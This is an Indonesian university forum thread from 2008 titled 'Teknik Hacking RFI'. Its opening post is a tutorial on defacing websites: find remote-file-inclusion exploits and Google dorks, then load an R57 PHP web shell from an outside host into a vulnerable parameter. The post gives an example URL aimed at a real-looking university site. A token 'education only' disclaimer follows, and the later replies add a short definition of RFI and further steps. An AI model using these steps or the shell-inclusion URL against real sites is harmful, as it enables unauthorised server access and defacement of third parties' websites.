UNKLAB FORUM

Forum Mahasiswa & Alumni Universitas Klabat
 
HomeFAQSearchMemberlistUsergroupsRegisterLog in
Bagi Guest atau user yang tidak terdaftar, mohon maaf karena ada beberapa thread tidak bisa diakses oleh guest, oleh karena itu, sebaiknya anda registrasi terlebih untuk bisa mengakses penuh forum ini. Baca dulu peraturan forum ini. Terima Kasih
Navigation
 Index
 Memberlist
 Profile
 FAQ
 Search
Search
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» Lowongan Pekerjaan PT. PNM (Persero)
Wed Nov 08, 2017 7:01 pm by CLiFF

» .NET Programming
Tue Mar 15, 2011 6:49 pm by Marvin07

» Bagaimana Menginstal OS dari USB???
Thu Feb 10, 2011 9:55 pm by unaitech

» Automatic Installation BackTrack 3 Final | Dual Booting
Thu Feb 10, 2011 9:53 pm by unaitech

» simple hacking test
Thu Feb 10, 2011 7:38 pm by and213

» [tutor] How To Patch SQL Injection Bug
Thu Feb 10, 2011 9:52 am by unaitech

» what ur distro..?
Thu Feb 10, 2011 9:48 am by unaitech

» netcut source-code
Thu Feb 10, 2011 9:44 am by unaitech

» Ragnarok Online
Mon Jan 31, 2011 1:57 pm by Marvin07

FRIENDS
Ads

    No ads available.



    Share | 
     

     Teknik Hacking RFI

    View previous topic View next topic Go down 
    AuthorMessage
    y0ng_en9el
    Pro
    Pro


    Male Number of posts : 919
    Age : 32
    Location : In your heart
    Points : 78
    Registration date : 2008-06-10

    PostSubject: Teknik Hacking RFI   Sat Aug 09, 2008 11:25 pm

    BT malam mimgguan gak ama cewek Laughing lansung terpikir mau buat tutorial Hacking dengan menggunakan PHP Shell. Da lama gak ngehack, ni atik cuma minta target pa tmn, lagian ini cuma buat edukasi doank. OK.
    Ketemu lg dengan Engel Laughing bahas tentang cara Deface menggunakan PHP Shell R57 Smile Sekarang kita cari bug (hole/lubang buat kita masuk ke server Target) nya. Klo atik biasanya .Cari di Milw0rm. Cari yang "remote" yak… Why ??? Coz mang kita mo masuk server target melalui remote (tidak melalui server target secara langsung). Cari yang "remote file inclusion" or "multiply remote file inclusion". Klo da dapat,,bagus lah Very Happy Masukkan dork nya di google or search engine contoh google. Terus ikuti langkah2 yang ada di bugnya. Biasanya sih suruh nambahin ja file inject (R57 dalam kasus ne) di belakang file yang vuln. Contoh : " http://target.com/appserv/main.php?appserv_root=php shell ". appserv/main.php?appserv_root= adalah file yang vuln beserta variablenya, sedangkan PHP Shell adalah script yg skrg ak pake R57 Jangan lupa tambahin "?" (tanda tanya, tanpa petik). Kenapa ?? Karena R57tersebut sebenarnya adalah file PHP yang kita simpan sebagai file "txt".
    Contoh : http://tmr.thu.edu.tw//appserv/main.php?appserv_root=http://h1.badwaresite.www/mikmok/shell/r57.txt?

    Ok da lihat, pemampilannya. Jalan˛ dulu lihat isi servernya sapa tau ada yg mantap˛ Laughing trus sebelum itu jgn lupa buat script htmlnya, sebelum di upload. Ok. Dan silakan lihat hasilnya Laughing



    Kayaknya gitu cara deface menggunakan PHP Shell R57 Very Happy. Ingat ni cuma edukasi doank alias nambah pengetahuan. Ngedeface OVER itu gak baik, gunakan hacking utk kebaikan ( hacking ibarat pisau, di satu sisi bisa digunakan utk keperluan rumah tangga contoh : dapur , tp di satu sisi bisa melukai org ) Weiss.. file indexnya jangan dirubah atau di delete ya, coz kasian adminnya.

    Ok sampe disini pencerahan atik soal Deface.

    Thanks to : cliff, animonzter, sacrofia, CR7, M_Negro, Anime, Cokiki, Moon_Lee dan member˛ UK
    Back to top Go down
    View user profile http://hikari-community.co.nr
    CLiFF
    Administrator
    Administrator
    avatar

    Male Number of posts : 564
    Age : 31
    Location : Anywhere...
    Points : 10009
    Registration date : 2008-06-03

    PostSubject: Re: Teknik Hacking RFI   Mon Aug 11, 2008 4:50 pm

    mantap bro....

    _________________
    Einstein said "The true definition of stupidity is to do the same thing time and again and expect a different outcome."





    http://unklab.forum.st/
    Back to top Go down
    View user profile http://unklab.forum.st
    sacrofia
    Moderator
    Moderator
    avatar

    Male Number of posts : 460
    Age : 28
    Location : Jushin
    Points : 4
    Registration date : 2008-06-07

    PostSubject: Re: Teknik Hacking RFI   Thu Aug 14, 2008 7:48 am

    mantap dah,
    walaupun banyak istilah yang nda di mengerti Pusing
    Back to top Go down
    View user profile http://heavenbb.forumsland.com
    y0ng_en9el
    Pro
    Pro


    Male Number of posts : 919
    Age : 32
    Location : In your heart
    Points : 78
    Registration date : 2008-06-10

    PostSubject: Re: Teknik Hacking RFI   Thu Aug 14, 2008 5:59 pm

    sacrofia wrote:
    mantap dah,
    walaupun banyak istilah yang nda di mengerti Pusing


    yang gak ngerti apa mas ?? Laughing, sapa tau atik bisa bantu
    Back to top Go down
    View user profile http://hikari-community.co.nr
    CLiFF
    Administrator
    Administrator
    avatar

    Male Number of posts : 564
    Age : 31
    Location : Anywhere...
    Points : 10009
    Registration date : 2008-06-03

    PostSubject: Re: Teknik Hacking RFI   Thu Aug 14, 2008 7:16 pm

    sacrofia wrote:
    mantap dah,
    walaupun banyak istilah yang nda di mengerti Pusing

    iko jo dpe cara2... pasti jadi...

    nga nda mangarti lantaran blum coba

    _________________
    Einstein said "The true definition of stupidity is to do the same thing time and again and expect a different outcome."





    http://unklab.forum.st/
    Back to top Go down
    View user profile http://unklab.forum.st
    sacrofia
    Moderator
    Moderator
    avatar

    Male Number of posts : 460
    Age : 28
    Location : Jushin
    Points : 4
    Registration date : 2008-06-07

    PostSubject: Re: Teknik Hacking RFI   Sat Aug 16, 2008 7:25 am

    cliff wrote:


    iko jo dpe cara2... pasti jadi...

    nga nda mangarti lantaran blum coba
    iya sih


    y0ng_en9el wrote:



    yang gak ngerti apa mas ?? Laughing, sapa tau atik bisa bantu
    remote di sini apa artinya, terus yang "remote file inclusion" dan "multiply remote file inclusion" juga.
    sebenarnya mo coba sih, tapi bingung langkah pertamanya yang mana . . . !?
    bisa di jelaskan lagi nda ( klo perlu pake langkah per langkah)
    Back to top Go down
    View user profile http://heavenbb.forumsland.com
    y0ng_en9el
    Pro
    Pro


    Male Number of posts : 919
    Age : 32
    Location : In your heart
    Points : 78
    Registration date : 2008-06-10

    PostSubject: Re: Teknik Hacking RFI   Sat Aug 16, 2008 5:52 pm

    sacrofia wrote:

    remote di sini apa artinya, terus yang "remote file inclusion" dan "multiply remote file inclusion" juga.
    sebenarnya mo coba sih, tapi bingung langkah pertamanya yang mana . . . !?
    bisa di jelaskan lagi nda ( klo perlu pake langkah per langkah)

    Remote file inclusion dapat diartikan sebagai penyisipan sebuah file dari luar suatu file dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load. ( sebenarnya multiply remote file inclusion sama aja dengan remote file inclusion, beda˛ tipis kwa Laughing )

    Langkah pertama, cari exploit & dork, web shell/php shell dan script html << itu yg paling inti dari hacking RFI.
    Langkah kedua, buka search engine yang tersedia pada situs˛
    Back to top Go down
    View user profile http://hikari-community.co.nr
    sacrofia
    Moderator
    Moderator
    avatar

    Male Number of posts : 460
    Age : 28
    Location : Jushin
    Points : 4
    Registration date : 2008-06-07

    PostSubject: Re: Teknik Hacking RFI   Sat Aug 16, 2008 7:39 pm

    y0ng_en9el wrote:
    Remote file inclusion dapat diartikan sebagai penyisipan sebuah file dari luar suatu file dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load. ( sebenarnya multiply remote file inclusion sama aja dengan remote file inclusion, beda˛ tipis kwa Laughing )

    Langkah pertama, cari exploit & dork, web shell/php shell dan script html << itu yg paling inti dari hacking RFI.
    Langkah kedua, buka search engine yang tersedia pada situs˛

    oh, kirain remote itu maksudnya bisa mengendalikan suatu web Razz

    thanks udah ada langkah2nya . . .
    but . . .
    bagaimana tuh caranya cari exploit & dork, . . .
    maap2 masih awam sih Razz
    Back to top Go down
    View user profile http://heavenbb.forumsland.com
    y0ng_en9el
    Pro
    Pro


    Male Number of posts : 919
    Age : 32
    Location : In your heart
    Points : 78
    Registration date : 2008-06-10

    PostSubject: Re: Teknik Hacking RFI   Sat Aug 16, 2008 7:47 pm

    cari aja di milw0rm banyak tuh disitu <<<
    Back to top Go down
    View user profile http://hikari-community.co.nr
    moon_lee
    Moderator
    Moderator
    avatar

    Female Number of posts : 433
    Age : 30
    Location : BITOENG CITY ^^
    Points : 54
    Registration date : 2008-07-24

    PostSubject: Re: Teknik Hacking RFI   Fri Aug 22, 2008 2:41 am

    jah...kita kira hacking RF!!!! lol! lol!

    engell...bilang kata mo kase ajarr pa qt... tongue

    bgmanaa eeee.....
    Back to top Go down
    View user profile
    y0ng_en9el
    Pro
    Pro


    Male Number of posts : 919
    Age : 32
    Location : In your heart
    Points : 78
    Registration date : 2008-06-10

    PostSubject: Re: Teknik Hacking RFI   Fri Aug 22, 2008 12:15 pm

    moon_lee wrote:
    jah...kita kira hacking RF!!!! lol! lol!

    engell...bilang kata mo kase ajarr pa qt... tongue

    bgmanaa eeee.....

    Ohh iyo kote engel lupa... sorry Sad

    engel p waktu banyak, klo moon_lee perlu calling/sms pa engel, nanti engel siap menuju ke TKP Laughing mo ba ajar p Moon. OK cheers
    Back to top Go down
    View user profile http://hikari-community.co.nr
    moon_lee
    Moderator
    Moderator
    avatar

    Female Number of posts : 433
    Age : 30
    Location : BITOENG CITY ^^
    Points : 54
    Registration date : 2008-07-24

    PostSubject: Re: Teknik Hacking RFI   Fri Aug 22, 2008 12:32 pm

    ditunggu kalow gituuu cheers
    Back to top Go down
    View user profile
    bronkolous
    Newbie
    Newbie
    avatar

    Male Number of posts : 20
    Age : 31
    Location : in house
    Points : 0
    Registration date : 2008-10-04

    PostSubject: Re: Teknik Hacking RFI   Sat Oct 04, 2008 4:46 pm

    bos bolehstou se ajar p kita ini..

    aku hanyalah orang bias yang tidak tau apa"
    Back to top Go down
    View user profile
    y0ng_en9el
    Pro
    Pro


    Male Number of posts : 919
    Age : 32
    Location : In your heart
    Points : 78
    Registration date : 2008-06-10

    PostSubject: Re: Teknik Hacking RFI   Sat Oct 04, 2008 6:40 pm

    bronkolous wrote:
    bos bolehstou se ajar p kita ini..

    aku hanyalah orang bias yang tidak tau apa"

    Sama˛ kita belajar pak
    Back to top Go down
    View user profile http://hikari-community.co.nr
    bronkolous
    Newbie
    Newbie
    avatar

    Male Number of posts : 20
    Age : 31
    Location : in house
    Points : 0
    Registration date : 2008-10-04

    PostSubject: Re: Teknik Hacking RFI   Sun Oct 05, 2008 3:05 am

    oke dang...
    Back to top Go down
    View user profile
    Sponsored content




    PostSubject: Re: Teknik Hacking RFI   

    Back to top Go down
     
    Teknik Hacking RFI
    View previous topic View next topic Back to top 
    Page 1 of 1

    Permissions in this forum:You cannot reply to topics in this forum
    UNKLAB FORUM :: KLABAT UNIVERSITY :: Computer Science Faculty :: Computer Security :: Hacking, Cracking, Etc.-
    Jump to: